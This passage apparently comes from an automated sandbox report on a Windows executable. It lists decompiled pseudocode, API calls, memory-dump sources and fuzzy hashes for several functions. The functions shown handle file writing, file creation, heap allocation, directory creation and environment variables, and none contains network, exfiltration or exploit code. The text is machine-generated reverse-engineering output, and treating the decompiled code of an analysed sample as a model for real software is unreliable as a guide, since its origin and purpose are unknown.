                                                                                                                                                                      0x00401dd9
                                                                                                                                                                      0x00401ddb
                                                                                                                                                                      0x00401de0
                                                                                                                                                                      0x00401de2
                                                                                                                                                                      0x00401ded
                                                                                                                                                                      0x00401df2
                                                                                                                                                                      0x00401df3
                                                                                                                                                                      0x00401df5
                                                                                                                                                                      0x00401dfa
                                                                                                                                                                      0x00401e06
                                                                                                                                                                      0x00401e0c
                                                                                                                                                                      0x00401e0d
                                                                                                                                                                      0x00401e0d
                                                                                                                                                                      0x00401de0
                                                                                                                                                                      0x00401e26
                                                                                                                                                                      0x00401e2f
                                                                                                                                                                      0x00401e38
                                                                                                                                                                      0x00401e41
                                                                                                                                                                      0x00401e4a
                                                                                                                                                                      0x00401e4f
                                                                                                                                                                      0x00401e53
                                                                                                                                                                      0x00401e54
                                                                                                                                                                      0x00401e54
                                                                                                                                                                      0x00401da4

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 00409638: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                                                                                                                                                        • Part of subcall function 00409638: wcscmp.MSVCRT ref: 00409662
                                                                                                                                                                        • Part of subcall function 00409638: memmove.MSVCRT ref: 0040967A
                                                                                                                                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00417040,00000000), ref: 00401BCD
                                                                                                                                                                      • EnumResourceTypesW.KERNEL32 ref: 00401BEA
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401BF2
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983379767-0
                                                                                                                                                                      • Opcode ID: 0063aafd9020792fbe265351b06ea94fb08b9e32f4b7edb8fab04e6c2952d322
                                                                                                                                                                      • Instruction ID: 3462f3606e8cbb1e1a4d79c74de0940f317b4d1ea5cf6404f74aab9d4bf66b3f
                                                                                                                                                                      • Opcode Fuzzy Hash: 0063aafd9020792fbe265351b06ea94fb08b9e32f4b7edb8fab04e6c2952d322
                                                                                                                                                                      • Instruction Fuzzy Hash: 4251F7B59047006AE6007BF2DD86E7F66AEDBD4718F10883FB5407D0D2CA3C8C5966AD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AFC0, Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 66%
                                                                                                                                                                      			E0040AFC0(long __edx, void** _a4, void* _a8, long _a12) {
				long _v4;
				long _v8;
				long _v12;
				void* _t36;
				void* _t38;
				void* _t45;
				void* _t49;
				long _t58;
				void* _t63;
				long _t69;
				void** _t75;

				_t75 = _a4;
				_v12 = 0;
				if(_t75[7] != 0) {
					return 0;
				} else {
					if(_t75[5] == 1) {
						_t58 =  ~(_t75[3]);
						asm("cdq");
						_v8 = _t58;
						_v4 = __edx;
						SetFilePointer( *_t75, _t58,  &_v4, 1); // executed
						_t75[5] = 0;
						_t75[3] = _t75[2];
					}
					_t36 = _t75[3];
					_t69 = _a12;
					if(_t36 <= _t69) {
						E0040A9E0(_t75);
						_t38 = _t75[2];
						if(_t69 < _t38) {
							_push(_t69);
							_push(_a8);
							_t63 = _t75[1] - _t75[3] + _t38;
							goto L8;
						} else {
							WriteFile( *_t75, _a8, _t69,  &_v12, 0); // executed
							return _v12;
						}
					} else {
						_t63 = _t75[2] + _t75[1] - _t36;
						_t45 = _t69 - 1;
						if(_t45 == 0) {
							 *_t63 =  *_a8;
							_t75[3] = _t75[3] - _t69;
							return _t69;
						} else {
							_t49 = _t45 - 1;
							if(_t49 == 0) {
								 *_t63 =  *_a8;
								_t75[3] = _t75[3] - _t69;
								return _t69;
							} else {
								if(_t49 == 2) {
									 *_t63 =  *_a8;
									_t75[3] = _t75[3] - _t69;
									return _t69;
								} else {
									_push(_t69);
									_push(_a8);
									L8:
									memcpy(_t63, ??, ??);
									_t75[3] = _t75[3] - _t69;
									return _t69;
								}
							}
						}
					}
				}
			}














                                                                                                                                                                      0x0040afc4
                                                                                                                                                                      0x0040afc8
                                                                                                                                                                      0x0040afd4
                                                                                                                                                                      0x0040b0cd
                                                                                                                                                                      0x0040afda
                                                                                                                                                                      0x0040afde
                                                                                                                                                                      0x0040afe9
                                                                                                                                                                      0x0040afeb
                                                                                                                                                                      0x0040aff0
                                                                                                                                                                      0x0040aff4
                                                                                                                                                                      0x0040aff8
                                                                                                                                                                      0x0040b001
                                                                                                                                                                      0x0040b008
                                                                                                                                                                      0x0040b008
                                                                                                                                                                      0x0040b00b
                                                                                                                                                                      0x0040b00f
                                                                                                                                                                      0x0040b015
                                                                                                                                                                      0x0040b089
                                                                                                                                                                      0x0040b08e
                                                                                                                                                                      0x0040b093
                                                                                                                                                                      0x0040b0bb
                                                                                                                                                                      0x0040b0bc
                                                                                                                                                                      0x0040b0c0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040b095
                                                                                                                                                                      0x0040b0a3
                                                                                                                                                                      0x0040b0b2
                                                                                                                                                                      0x0040b0b2
                                                                                                                                                                      0x0040b017
                                                                                                                                                                      0x0040b01d
                                                                                                                                                                      0x0040b021
                                                                                                                                                                      0x0040b022
                                                                                                                                                                      0x0040b079
                                                                                                                                                                      0x0040b07d
                                                                                                                                                                      0x0040b085
                                                                                                                                                                      0x0040b024
                                                                                                                                                                      0x0040b024
                                                                                                                                                                      0x0040b025
                                                                                                                                                                      0x0040b063
                                                                                                                                                                      0x0040b068
                                                                                                                                                                      0x0040b070
                                                                                                                                                                      0x0040b027
                                                                                                                                                                      0x0040b02a
                                                                                                                                                                      0x0040b04d
                                                                                                                                                                      0x0040b051
                                                                                                                                                                      0x0040b059
                                                                                                                                                                      0x0040b02c
                                                                                                                                                                      0x0040b02c
                                                                                                                                                                      0x0040b02d
                                                                                                                                                                      0x0040b031
                                                                                                                                                                      0x0040b032
                                                                                                                                                                      0x0040b03c
                                                                                                                                                                      0x0040b044
                                                                                                                                                                      0x0040b044
                                                                                                                                                                      0x0040b02a
                                                                                                                                                                      0x0040b025
                                                                                                                                                                      0x0040b022
                                                                                                                                                                      0x0040b015

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AFF8
                                                                                                                                                                      • memcpy.MSVCRT ref: 0040B032
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointermemcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1104741977-0
                                                                                                                                                                      • Opcode ID: 0eefa4f874f6ecccfca5fc54179e78147f46ecb2304ab69a4aa20b4cccdc9a3e
                                                                                                                                                                      • Instruction ID: ace082a42c8b9570e8fa48c2980c6e4681abbcae92d9a1b023345ff456592002
                                                                                                                                                                      • Opcode Fuzzy Hash: 0eefa4f874f6ecccfca5fc54179e78147f46ecb2304ab69a4aa20b4cccdc9a3e
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B313A392007009FC220DF29D844E5BB7E5EFD8714F04882EE59A97750D335E919CFA6
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AC70, Relevance: 4.6, APIs: 3, Instructions: 76filememoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040AC70(void* __ebx, void* _a4, WCHAR* _a8) {
				void* _t13;
				long _t16;
				long _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t25;

				_t25 = _a4;
				_t23 = 0;
				_t24 = E0040D438( *0x41771c, _t25);
				if(_t24 == 0) {
					return 0;
				} else {
					_t13 = CreateFileW(_a8, 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					_t21 = _t13;
					if(_t21 != 0xffffffff) {
						L3:
						if(_t21 == 0) {
							goto L10;
						} else {
							_t16 =  *0x41612c; // 0x1000
							if(_t16 == 0) {
								 *(_t24 + 4) = _t23;
							} else {
								 *(_t24 + 4) = HeapAlloc( *0x417008, 0, _t16);
							}
							 *_t24 = _t21;
							_t17 =  *0x41612c; // 0x1000
							 *(_t24 + 0xc) = _t23;
							 *(_t24 + 0x1c) = _t23;
							_t23 = _t24;
							 *(_t24 + 8) = _t17;
							 *((intOrPtr*)(_t24 + 0x14)) = 1;
							 *(_t24 + 0x18) = 2;
							if(_t25 != 0xffffffff) {
								_t23 = _t21;
							}
							if(_t23 == 0) {
								goto L10;
							}
						}
					} else {
						_t19 = CreateFileW(_a8, 0x40000000, 0, 0, 5, 0, 0); // executed
						_t21 = _t19;
						if(_t21 == 0xffffffff) {
							L10:
							if(_t25 != 0xffffffff) {
								_t24 = _t25;
							}
							E0040D3AA( *0x41771c, _t24);
						} else {
							goto L3;
						}
					}
					return _t23;
				}
			}











                                                                                                                                                                      0x0040ac71
                                                                                                                                                                      0x0040ac7e
                                                                                                                                                                      0x0040ac85
                                                                                                                                                                      0x0040ac89
                                                                                                                                                                      0x0040ad3c
                                                                                                                                                                      0x0040ac8f
                                                                                                                                                                      0x0040aca3
                                                                                                                                                                      0x0040aca9
                                                                                                                                                                      0x0040acae
                                                                                                                                                                      0x0040accc
                                                                                                                                                                      0x0040acce
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040acd0
                                                                                                                                                                      0x0040acd0
                                                                                                                                                                      0x0040acd7
                                                                                                                                                                      0x0040aced
                                                                                                                                                                      0x0040acd9
                                                                                                                                                                      0x0040ace8
                                                                                                                                                                      0x0040ace8
                                                                                                                                                                      0x0040acf0
                                                                                                                                                                      0x0040acf2
                                                                                                                                                                      0x0040acf7
                                                                                                                                                                      0x0040acfa
                                                                                                                                                                      0x0040acfd
                                                                                                                                                                      0x0040acff
                                                                                                                                                                      0x0040ad02
                                                                                                                                                                      0x0040ad09
                                                                                                                                                                      0x0040ad13
                                                                                                                                                                      0x0040ad15
                                                                                                                                                                      0x0040ad15
                                                                                                                                                                      0x0040ad19
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ad19
                                                                                                                                                                      0x0040acb0
                                                                                                                                                                      0x0040acbf
                                                                                                                                                                      0x0040acc5
                                                                                                                                                                      0x0040acca
                                                                                                                                                                      0x0040ad1b
                                                                                                                                                                      0x0040ad1e
                                                                                                                                                                      0x0040ad20
                                                                                                                                                                      0x0040ad20
                                                                                                                                                                      0x0040ad29
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040acca
                                                                                                                                                                      0x0040ad34
                                                                                                                                                                      0x0040ad34

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040D438: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
                                                                                                                                                                        • Part of subcall function 0040D438: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE
                                                                                                                                                                      • CreateFileW.KERNELBASE(00000001,C0000000,00000000,00000000,00000002,00000080,00000000,00000001,00000000,?,?,?,0040474F,FFFFFFFF,?,00000000), ref: 0040ACA3
                                                                                                                                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000000,00000000,00000005,00000000,00000000,?,?,?,0040474F,FFFFFFFF,?,00000000,00000000,00000000), ref: 0040ACBF
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,0040474F,FFFFFFFF,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00403D71), ref: 0040ACE2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalFileSection$AllocEnterHeapLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 49537883-0
                                                                                                                                                                      • Opcode ID: 4dd531b9fa248f024298d31622ac81a62092c3937c8fe5ab716ac7b1fb55e9df
                                                                                                                                                                      • Instruction ID: f6fed0e380c2868238a2ed1f5ecffa77528f81bfe2ad71e922a363fc64bec02a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4dd531b9fa248f024298d31622ac81a62092c3937c8fe5ab716ac7b1fb55e9df
                                                                                                                                                                      • Instruction Fuzzy Hash: F821CF31200700ABD3305B2AAC48F57BEA9EFC5B64F11863EF565A36E0D6359815CB29
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040DE60, Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040DE60(void** _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr* _v12;
				long _t19;
				void* _t23;
				void* _t26;
				void* _t27;
				void* _t41;
				void* _t46;

				_t19 =  *0x416170; // 0x1b
				_v12 = TlsGetValue(_t19);
				_v8 =  *((intOrPtr*)(_v12 + 8)) - _a8;
				if( *_a4 != 0) {
					_t41 =  *0x417720; // 0x2370000
					_t23 = RtlReAllocateHeap(_t41, 0,  *_a4, _v8 + 0xa); // executed
					 *_a4 = _t23;
				} else {
					_t46 =  *0x417720; // 0x2370000
					_t27 = RtlAllocateHeap(_t46, 0, _v8 + 0xa); // executed
					 *_a4 = _t27;
				}
				_t26 = E0040E300( *_v12 + _a8,  *_a4,  *_v12 + _a8, _v8 >> 1);
				 *((intOrPtr*)(_v12 + 8)) = _a8;
				return _t26;
			}











                                                                                                                                                                      0x0040de66
                                                                                                                                                                      0x0040de72
                                                                                                                                                                      0x0040de7e
                                                                                                                                                                      0x0040de87
                                                                                                                                                                      0x0040deb5
                                                                                                                                                                      0x0040debc
                                                                                                                                                                      0x0040dec5
                                                                                                                                                                      0x0040de89
                                                                                                                                                                      0x0040de92
                                                                                                                                                                      0x0040de99
                                                                                                                                                                      0x0040dea2
                                                                                                                                                                      0x0040dea2
                                                                                                                                                                      0x0040dedc
                                                                                                                                                                      0x0040dee7
                                                                                                                                                                      0x0040deed

                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                      • RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040DEBC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap$Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2497967046-0
                                                                                                                                                                      • Opcode ID: f865e40a7b47dc49b25cd0656b7d544d8748bc79d9d02905389b3cc1b6fb08eb
                                                                                                                                                                      • Instruction ID: e6d91f3b09335801e5746b2964150cf116aaa33277573073d0b775b4e860d931
                                                                                                                                                                      • Opcode Fuzzy Hash: f865e40a7b47dc49b25cd0656b7d544d8748bc79d9d02905389b3cc1b6fb08eb
                                                                                                                                                                      • Instruction Fuzzy Hash: E511B974A00208EFCB04DF98D894EAABBB6FF88315F10C559E9099B354D735AA41CB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A665, Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040A665(wchar_t* _a4) {
				short _v8;
				short _v528;
				WCHAR* _t18;
				int _t20;
				signed int _t23;

				if(_a4 == 0) {
					return 0;
				}
				wcsncpy( &_v528, _a4, 0x104);
				_v8 = 0;
				_t18 =  &(( &_v528)[wcslen( &_v528)]);
				while(_t18 >  &_v528) {
					_t23 =  *(_t18 - 2) & 0x0000ffff;
					if(_t23 == 0x20 || _t23 == 0x5c || _t23 == 0x2f) {
						_t18 =  &(_t18[0xffffffffffffffff]);
						continue;
					} else {
						break;
					}
				}
				 *_t18 = 0;
				_t20 = CreateDirectoryW( &_v528, 0); // executed
				return _t20;
			}








                                                                                                                                                                      0x0040a672
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a6dd
                                                                                                                                                                      0x0040a683
                                                                                                                                                                      0x0040a68a
                                                                                                                                                                      0x0040a6a3
                                                                                                                                                                      0x0040a6be
                                                                                                                                                                      0x0040a6a8
                                                                                                                                                                      0x0040a6af
                                                                                                                                                                      0x0040a6bb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a6af
                                                                                                                                                                      0x0040a6ca
                                                                                                                                                                      0x0040a6d5
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectorywcslenwcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 961886536-0
                                                                                                                                                                      • Opcode ID: 40426c4a27e9655a37d458fcd41d9c62d4d21f52a2c09d6ab7b3f43a5b08421e
                                                                                                                                                                      • Instruction ID: 630a5c6db6187271ae83db4eaeb36511880b8bdc4cdf20ec5a399f16e344c0a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 40426c4a27e9655a37d458fcd41d9c62d4d21f52a2c09d6ab7b3f43a5b08421e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F01DBB08113189BCB24DB64CC8DABA7378DF00300F6446BBE455E21D1E77A9AA4DB4A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408D8E, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 16%
                                                                                                                                                                      			E00408D8E(void* __ecx) {
				intOrPtr _v8;
				void _v12;
				void* _t7;

				memset( &_v12, 0, 8);
				_v12 = 8;
				_t7 =  &_v12;
				_v8 = 0xb48;
				__imp__InitCommonControlsEx(_t7, __ecx, __ecx);
				__imp__CoInitialize(0); // executed
				return _t7;
			}






                                                                                                                                                                      0x00408d9b
                                                                                                                                                                      0x00408da3
                                                                                                                                                                      0x00408daa
                                                                                                                                                                      0x00408dad
                                                                                                                                                                      0x00408db5
                                                                                                                                                                      0x00408dbd
                                                                                                                                                                      0x00408dc6

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00408D9B
                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408DB5
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00408DBD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommonControlsInitInitializememset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2179856907-0
                                                                                                                                                                      • Opcode ID: 5fe436f70463189401810c8ea8ae9fa3e8af9a379760f2b470c78f7c9900ce65
                                                                                                                                                                      • Instruction ID: 781e80edae316a95334d3837f50a89f25f26191aceb080d9ad1fe250ea93eb12
                                                                                                                                                                      • Opcode Fuzzy Hash: 5fe436f70463189401810c8ea8ae9fa3e8af9a379760f2b470c78f7c9900ce65
                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E6B594030CBBDB409FD0DC0EF9D7B7CE704705F404565F50496181EBB596048B95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409860, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00409860(WCHAR* _a4, WCHAR* _a8) {
				void* _t4;
				WCHAR* _t5;
				int _t6;

				if(_a4 != 0) {
					_t5 = _a8;
					if(_t5 == 0) {
						_t5 = 0x412024;
					}
					_t6 = SetEnvironmentVariableW(_a4, _t5); // executed
					return _t6;
				}
				return _t4;
			}






                                                                                                                                                                      0x00409865
                                                                                                                                                                      0x00409867
                                                                                                                                                                      0x0040986d
                                                                                                                                                                      0x0040986f
                                                                                                                                                                      0x0040986f
                                                                                                                                                                      0x00409879
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409879
                                                                                                                                                                      0x0040987f

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEnvironmentVariableW.KERNELBASE(02379F50,02379F50,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
